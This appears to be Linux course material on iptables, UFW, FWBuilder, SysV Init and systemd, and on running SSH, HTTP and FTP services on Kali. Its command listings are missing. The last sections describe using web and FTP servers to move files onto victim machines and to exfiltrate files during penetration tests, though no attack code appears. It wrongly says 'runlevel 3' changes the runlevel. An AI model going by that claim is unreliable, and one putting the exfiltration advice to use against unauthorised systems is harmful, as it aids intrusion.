filter: This is the default table (if no -t option is passed). It contains the built-in chains INPUT (for packets destined to local sockets), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets).
nat: This table is consulted when a packet that creates a new connection is encountered. It consists of four built-ins: PREROUTING (for altering packets as soon as they come in), INPUT (for altering packets destined for local sockets), OUTPUT (for altering locally-generated packets before routing), and POSTROUTING (for altering packets as they are about to go out). IPv6 NAT support is available since kernel 3.7.
mangle: This table is used for specialized packet alteration. Until kernel 2.4.17 it had two built-in chains: PREROUTING (for altering incoming packets before routing) and OUTPUT (for altering locally-generated packets before routing). Since kernel 2.4.18, three other built-in chains are also supported: INPUT (for packets coming into the box itself), FORWARD (for altering packets being routed through the box), and POSTROUTING (for altering packets as they are about to go out).
raw: This table is used mainly for configuring exemptions from connection tracking in combination with the NOTRACK target. It registers at the netfilter hooks with higher priority and is thus called before ip_conntrack, or any other IP tables. It provides the following built-in chains: PREROUTING (for packets arriving via any network interface) OUTPUT (for packets generated by local processes)
security: This table is used for Mandatory Access Control (MAC) networking rules, such as those enabled by the SECMARK and CONNSECMARK targets. Mandatory Access Control is implemented by Linux Security Modules such as SELinux. The security table is called after the filter table, allowing any Discretionary Access Control (DAC) rules in the filter table to take effect before MAC rules. This table provides the following built-in chains: INPUT (for packets coming into the box itself), OUTPUT (for altering locally-generated packets before routing), and FORWARD (for altering packets being routed through the box).
In the default table (filter), INPUT, FORWARD, and OUTPUT are displayed. These are called chains and define the direction of network traffic flow. INPUT is related to any connection that is coming into the host. OUTPUT is for any connection leaving the host. FORWARD is related to how to redirect network traffic, and will commonly be used in a Linux router configuration. There are more chains in other tables, but those are out-of-scope for this course.
The default policy for each of the chains in the listing are set to ACCEPT, so we can consider the firewall to be completely open. The other policies that can be used are the actions that were mentioned earlier. The possible policies would be ACCEPT, DROP, and REJECT. Let’s change the default policy for the FORWARD chain to DROP, since our Kali host is not going to function as a router. We do this with the -P option for the policy.
Now that we have a basis of terms and can list the rules in the default table, let’s move on to creating the rules that make up the firewall. Having an understanding that the host has multiple network paths - INPUT (traffic going into the host), OUTPUT (traffic coming out of the host), and FORWARD (traffic that is routed in the host) - is critical in understanding the nature of traffic that we will allow, reject, or drop.
IPTables (Parameters, Modifying Rules with -A/-D/-I)
Covering firewalls as a concept would be useless without analyzing a few rules. Beyond this, it is much stronger if we know how to set iptables and have the capability of setting up the firewall. Let’s build on what we learned about ACLs, default policies, actions, and listing the firewall rules on a Linux host.
To begin, let’s define some important iptables options. These are used to set the rules of the firewall.
The -p option defines what protocol is to be considered in the rule. The most common protocol types are tcp, udp, and icmp traffic. The all parameter can be passed to the option to cover all possible protocols, as well.
The -s option defines the source address in the connection. The parameter can be a network name, hostname, a network IP address with a /mask value, or simply an IP address of a host. This is the location the network traffic is coming from.
The -d option defines the destination address in the connection. The parameter for the destination also follows the syntax options for the -s option. This is the location the network traffic is going to.
The -i and -o options define the interfaces involved in the connection. -i is for the interface that the connection is going in, and -o is the interface going out. These options will not be covered further in this section, as they are more related to routing and working with the FORWARD chain. It is still useful to know these options as they relate to firewall traffic flow.
Knowing these options alone cannot get us all the way to configuring the firewall rules. We also need to cover how to add, check, delete, insert, and replace rules in the chains.
The -A option is used to append a rule to the chain entered as the parameter. This will add the rule to the end of the rules already in the chain.
The -C option is used to check if the rule is already in the chain. This helps prevent duplicate entries in a chain.
The -D option is used to delete a rule from a chain and can use the rule-specification or the line number.
The -I option is used to insert a rule in a chain using a line number and then the rule-specification to insert in place for that line number. The other rules below that line entry will shift by one, so be careful when inserting multiple rules one after the other.
The -R option is used to replace a rule in a chain using a line number and then the rule-specification to replace the entry in that line. This is different than -I in that the other rule line numbers will not change and the value of the entry line number chosen will be replaced with the new value. Be careful not to replace the wrong entry, as that will remove the rule from the chain.
Now that we have the important options covered, let’s work with adding some firewall rules with iptables. For the following demonstrations, the IP addresses used will be arbitrary. This is meant to demonstrate how to work with the iptables utility.
For the sake of this activity, let’s add some more arbitrary rules to the INPUT chain. Let’s add the localhost IP, 127.0.0.1, as the source and destination. Let’s also add the IP address of 192.168.1.37 as the source with the TCP protocol.
Let’s now append another firewall rule for the name localhost and see what happens. For this, let’s just add it as the source address.
Notice that the first time we added the literal IP for the localhost, 127.0.0.1. That rule-specificaiton resolved in the sudo iptables -L output to localhost. When we used localhost as the source address in this last command execution, there are now two entries with the same information. This is due to localhost being resolved to the IPv4 address and the IPv6 address. Again, those addresses resolve back to localhost in the output. Let’s take a look at deleting these duplicate lines we just added.
The command to delete the duplicate rule ended up removing both of the rules. It didn’t delete the other rule with localhost, since the destination specification was different between the rules added in the last command and the other rule-specification added previously. Let’s append that rule again and list it with the —line-numbers option.
Now that we can see the line numbers in the output. If we use the line number to delete one of the duplicate entries, we can avoid removing all entries that fit the same rule-specification. Let’s do this now.
It is important to note that firewalls work from the top of the list and go to each next line until a match is found. This being said, if there are conflicts between rules, the first line read will be the one used in the firewall configuration. If we look at the output again, we can see there may be a current conflict with the 192.168.1.0/24 network and the 192.168.1.37 host. Let’s insert the rule-specification for 192.168.1.37 to line 1 and then delete the duplicate entry that already was in the list.
We can also show the amount of traffic in terms of packets and bytes with the -v option. Let’s take a look at what the traffic data is currently. In the command, we can also add the -n option to only display the IP addresses, instead of the canonical names. The output in your terminal session will be different.
Let’s generate some network traffic from our localhost to our localhost with the ping utility. After the ping, let’s look at the traffic amount again. Again, your output results will be different than the listing shown.
One last thing before we move on is that iptables is not persistent on a reboot. The rules must be saved with the iptables-save command. Let’s go ahead and save the current rules now.
Now that we covered how to work with adding rules to the firewall and modifying those, let’s take a look at refining these rules further to make a more practical firewall.
IPTables (Extended Rules and Default Policies)
Extended rules make the firewall more practical for filtering traffic based on multiple conditions. These are important to understand if the network traffic needs to be considered when creating the firewall ruleset.
In the last section, we took a look at the process of adding, removing, and inserting rules within a chain in the iptables. If you thought through the demonstration we did, “These rules don’t look like they do anything,” you’d be absolutely right! The default policy on the INPUT chain is ACCEPT, and the rules we added followed that default policy. Since the action wasn’t added in the commands we entered, the default policy action is inherited. Even if we changed the default policy to a different action, with the -P option, the rules in the chain would still inherit that policy action.
Let’s take another look at the iptables we have set up already. Again, your output may appear differently than the demonstration.
In the rule listing, let’s suppose that we want to drop all traffic from the 192.168.1.0/24 network but still allow the host at 192.168.1.37. Let’s replace the rule for the network and add the DROP target with the -j option.
As shown in the listing above, the target changed to DROP for the 192.168.1.0/24 network. Since firewalls work by reading the first rule and moving to the next until a match is found, the 192.168.1.37 host will still have access to our host. Let’s refine the access of this host to only the TCP port 8080 to our localhost. Again, we’ll use the replace option (-R) for this line entry. To specify the port, we will use the —dport (destination port) option.
If the source port is known and is relevant a firewall rule, the —sport option can be used to specify that. There is another option that can be used to create rules based on the type of connection made. This option is part of the conntrack module, which used the -m conntrack option. This subset of the module is the —ctstate option, which is part of the iptables-extensions package. There are more connection tracking states, but here are some important connection states. Note that on older Linux kernels, this would show as —state instead of —ctstate.
INVALID: The packet is associated with no known connection.
NEW: The packet has started a new connection or otherwise associated with a connection that has not seen packets in both directions.
ESTABLISHED: The packet is associated with a connection that has seen packets in both directions.
RELATED: The packet is starting a new connection, but is associated with an existing connection, such as an FTP data transfer or an ICMP error.
UNTRACKED: The packet is not tracked at all, which happens if you explicitly untrack it by using -j CT —notrack in the raw table.
Utilizing conntrack will make the iptables a stateful firewall.
This is to ensure that packets that are part of an existing connection, let’s insert the following as a new rule.
It’s a good practice to add a DROP action for any packet that has an INVALID connection state. Let’s start by inserting this rule at the beginning of the INPUT chain. Your output may appear different than the demonstration, but the first rule should look the same.
With this configuration of the firewall rules, any traffic that originates from our host will be accepted back into our host. The INVALID connections will immediately be dropped, as well.
Now that we covered extended rules, default policies, additional options, and creating a stateful firewall with iptables, you should now have the knowledge to create custom rule sets to satisfy a network’s or host’s firewall needs.
UFW and FWBuilder
Sometimes, it’s easier to have a frontend interface to handle the firewall rules. There are two tools that we can use to accomplish this: UFW (Uncomplicated Firewall) and FWBuilder. Both of these tools are simply frontend interfaces that leverage the power of iptables.
First, let’s look more at UFW. We can install this with sudo apt install ufw
.
Now that UFW is installed, we can check the status of the firewall with the sudo ufw status command. Let’s go ahead and do this.
The power of UFW lies in its convenience of use. It is a simple tool to add firewall rules. This can be done based on the applications installed on a host. To view the list of applications installed on the host that UFW can affect, run the sudo ufw app list command. Your output may be different than the demonstration.
SSH is highlighted in the listing. We can get more information about this application with the sudo ufw app info SSH. Note that case-sensitivity may affect the tool’s output.
To allow traffic through the firewall related to the application, we can use the allow directive. Let’s allow SSH to the firewall rules.
Now that SSH is added to the host firewall, the firewall needs to be enabled.
As shown in the listing, SSH is allowed on the host firewall from Anywhere. This is only a basic coverage of the ufw tool. Before moving on to FWBuilder, let’s disable UFW.
With UFW disabled, we can quickly look at FWBuilder and the GUI interface it has to offer.
To use fwbuilder, enter sudo fwbuilder. Your output may be different than the demonstration.
The GUI interface is a drag-and-drop interface. This is especially convenient when rules are out of order and need to be moved around. The modifications of rules are done in the lower Editor portion of the screen. The Editor pane will change depending on what is selected in the Policy pane.
It may be important to note that fwbuilder can automatically translate IPv4 and IPv6 addresses, or rules can be specified to fit either need. When finished with building the firewall rules in the GUI interface, the rules can be compiled and installed on the host. The generated file from the compilation is a script that will execute the rules set for the platform specified. In the case of the demonstration, the platform is iptables.
Managing Network Services
It is important to know and understand how services work on Linux systems. These services make up the capabilities of a host or network and can be leveraged to gain more privileges on a host or gain access to another host on a network. Beyond the benefits of understanding this from a security perspective, it is also valuable for a Linux System Administrator to know how to work with services on a system to ensure full system functionality. In this section, we’ll be looking at two variations of Linux services: SysV Init and Systemd.
SysV (service
, init
)
The service type, called SysV Init, is the legacy version of how Linux services work. Despite this being considered legacy, it is still widely in use and Systemd is backward compatible with it. To best understand services run on a system, it is important to define what runlevels are. Runlevels are designations set to how a Linux system starts and what services are running. They are divided into 7 categories.
- is the system state when it is halted - or powered off. This is not an effective runlevel, but it can be called on to execute a system shutdown.
- is known as Single User Mode. This is the state where only one user (root) can log into the system to conduct administrative tasks. Networking is disabled for this runlevel. The command-line interface is used.
- is Multiuser Mode. The network is disabled and the command-line interface is used.
- is Multiuser Mode with Networking. The command-line interface is used.
- is an Undefined Mode by default. This is available for a custom runlevel is wanted.
- is Multiuser Mode with a Graphical User Interface. Networking is also enabled. This is the default runlevel on any Linux distribution that is using a GUI.
- is the runlevel to restart the Linux host. This is another runlevel that is not effective, but it can be called on to execute a system restart.
To display the current working runlevel, the runlevel can be entered in the terminal. Let’s do this to see the current runlevel of our Kali host.
The configuration to set a Linux system’s default runlevel is /etc/inittab. Let’s take a look at a typical /etc/inittab file. It is important to know that Kali does not use SysV Init, so many of the concepts in this section will not be present in our Kali installation. For the following demonstration, a legacy version of Ubuntu is used to be able to showcase the concepts we are covering.
This /etc/inittab file is from an Ubuntu 6.06 installation. In the listing above, several entries are highlighted. The id:2:initdefault: line is the default runlevel for this host. The format for these lines is unique identifier:runlevel:action:process. For this installation, the default runlevel is Runlevel 2. In the si::sysinit:/etc/init.d/rcS line, the unique identifier is si. There is no associated runlevel. The action to take is sysinit. The process is /etc/init.d/rcS, which is a script that will execute when this identifier is called.
To change the current runlevel to a different one, we can enter the runlevel command. If we wanted to change the runlevel to Runlevel 3, for instance, we would enter runlevel 3. To avoid breaking our connection with the Kali host, let’s not do this. Regardless of us not exercising a runlevel change, be aware of how to do it.
Each runlevel will have a respective /etc/rc#.d/ directory associated with it. This is used to add the services that will be started for that runlevel in the form of scripts. Let’s take a look at /etc/rc2.d/ on this Ubuntu host.
In the listing above, 6 startup (S) scripts are shown. These are run in alphanumeric order as the system enters the Runlevel 2 state.
The service scripts are located in /etc/init.d/ by default on a SysV Init system. Let’s take a look at what scripts are available on the Ubuntu host.
In the listing above, ssh is included in the listing. We can work with services, outside of runlevels, with manual execution of the scripts in the /etc/init.d/ directory. Let’s start ssh service.
The ok response states that the ssh service was started and is running. There are many other possibilities for service actions. Let’s execute the ssh script without a parameter to see the actions we may be able to take.
It is important to note that not all service scripts will have a Usage displayed when the script is executed in an unaccepted way. This example is to demonstrate that {start|stop|reload|force-reload|restart} can be added to the script execution to take different actions with the service.
Let’s shift our focus back on our Kali host to cover one last thing about SysV Init, the service
command. Even though this technically isn’t the service utility, the functionality remains the same as though it were. The syntax for the service utility is service > service-name {start|stop|status}. Let’s start, get the status, and stop the ssh service on our Kali host.
The listing shows that the service is running after we execute the start action of the service. This is very similar to the ssh script shown in the /etc/init.d/ directory previously. service is considered to be a legacy command, so it may become less common to see SysV Init systems in the wild.
Systemd (sytemctl
)
Most Linux systems today are using a service startup system called Systemd. With this usage, it is important to understand how the services are managed. This section will cover how to determine if a Linux system is using Systemd, how to work with system services, why Linux moved away from SysV Init, and the similarities between the two.
Before moving into the details of Systemd, let’s figure out if Kali is using Systemd. To do this, we can look at the first process that was created on the Linux host. We can do this with the ps 1 command.
/sbin/init is historically a process that is used by SysV Init. Let’s look at that file to see what it is. We’ll use the file command to do this.
In the listing above, we can determine that our Kali host is using Systemd since the /sbin/init file is a symbolic link to /lib/systemd/systemd and is the first process used to initialize the system on startup.
Systemd uses a utility called systemctl to control it. This is very similar to the service utility, but the syntax is reversed for the service-name and action. Let’s take ssh as an example and start this on our host with systemctl.
Since there wasn’t an error output to our screen, we can expect that the ssh service is up and running. There are several other actions that can be taken with the systemctl utility, as well. The following are some important actions.
- stop will stop a service.
- status will show the running status of a service.
- reload will reload the configuration files for a service without the need to stop the service.
- enable/disable will mark the service to run at a system boot or not.
Let’s verify the status of the ssh service.
In SysV Init, we covered the concept of the 7 runlevels. We also looked at how runlevels were handled in the /etc/rc#.d/ directories and how the scripts would execute in alphanumeric order. Systemd improved upon this design through the utilization of target-units. Target-units are very similar in concept to runlevels, in that they define what services run at each target-unit level. Unlike runlevels, there is more flexibility to define more than 7 classifications. Let’s take a look at our Kali host’s target-units with the systemctl utility. Your host may appear different than the demonstration.
In the case of the listing above, there are currently 35 loaded units listed. This is much more dynamic than the limited 7 in SysV Init runlevels. There are also three categorizations for each target-unit: LOAD, ACTIVE, and SUB.
LOAD specifies if a target-unit is loaded in the Linux host. This means the system can read the unit configuration file. If it is loaded, it can be called on to change the target-unit behavior of the system. This can be used to take actions such as enabling/disabling network services on a system.
ACTIVE specifies if a particular target-unit is currently active or not. This does not necessarily mean that a set of services is running under that target, but the target-unit was run if it says active.
SUB specifies the status of the services running under a target-unit. Some service types can run a single time and are not continuous. This may show as exited. If a service is continuous and running, active will be shown under this field. If the process associated with the service is not running, dead will be shown in this field.
The benefit of target-units is that these can be run in parallel and isn’t a choice of one or the other. They do not need to be started or stopped in a sequenced order, like the /etc/rc#.d/ directories. There’s also an advantage of supplying dependencies (conditions that need to be before to an operation) within the target services. These will automatically start the dependencies or exit with an error if the dependency cannot be met. The target-units and services can be found in /usr/lib/systemd/system/. Let’s take a look at one of the service files in this directory.
The After line is how Systemd handles dependencies in services. A Before line could also be added if this service needed to start before another target-unit. The ExecStart line is the script execution to start the service. The WantedBy line defines which target this service should be included in. In the case of the listing example, the ssh service is included in the multi-user.target target-unit.
Despite there being so many target-units, there is still a correlation between runlevels and target-units. Let’s execute the following command on our Kali host to see how the target-units relate to runlevels.
There is much more to Systemd than what we covered here. We covered services and target-units with Systemd, but there are other types such as mount, link, socket, device, and more. These are not as important to understand as the concept of services and how it relates to the legacy SysV Init system.
SSH
The Secure Shell (SSH) service is most commonly used to remotely access a computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal.
We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command to search the output for sshd.
If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the systemctl command as follows. The systemctl command can be used to enable and disable most services within Kali Linux.
Unless ssh is used very often, we advise that the ssh service is started and stopped as needed. As such, we can disable the service to prevent it from starting at boot time.
Now that we know how to start the ssh service, we can utilize ssh to gain access to our host from other machines.
HTTP
The HTTP service can come in handy during a penetration test, either for hosting a site, or providing a platform for downloading files to a victim machine. The HTTP service is TCP-based and listens by default on port 80. To start the HTTP service in Kali, type the following command into a terminal.
As we did with the SSH service, we can verify that the HTTP service is running and listening on TCP port 80 by using the netstat and grep commands once again.
There is a much more common way to create a temporary web server that uses python. It is useful to have a temporary solution to run on demand and not worry about exposing ports on our Kali host that we don’t need. Before we can show that on port 80, we’ll need to stop the apache2 service. Let’s do that now.
Now that we won’t have a port conflict on port 80, let’s use the python module SimpleHTTPServer to start the web service with python.
The terminal session hangs after the execution of this command. This is due to the application currently being run. When we are finished with our web service needs, we can simply enter Ctrl + C.
Now that we covered two ways to start a web server, we can utilize this on penetration test engagements to download files into a compromised host.
FTP (pure-ftpd)
FTP is a great way to transfer files from one host to another quickly. This can be used to share files on the same network or even used to exfiltrate files from compromised machines. We covered the FTP client previously, so let’s move on to creating a simple FTP server on our Kali host.
Let’s quickly install the Pure-FTPd server on our Kali attack machine. If you already have an FTP server configured on your Kali system, you may skip these steps.
Before any clients can connect to our FTP server, we need to create a new user for Pure-FTPd. The following Bash script will automate user creation for us:
We will make the script executable, then run it and enter “lab” as the password for the offsec user when prompted:
Now that we have our FTP server set up, we can leverage this with the username and password we added when creating the server. As always, only run this service when you need it and stop it when you don’t.
Relevant Note(s): Linux Basics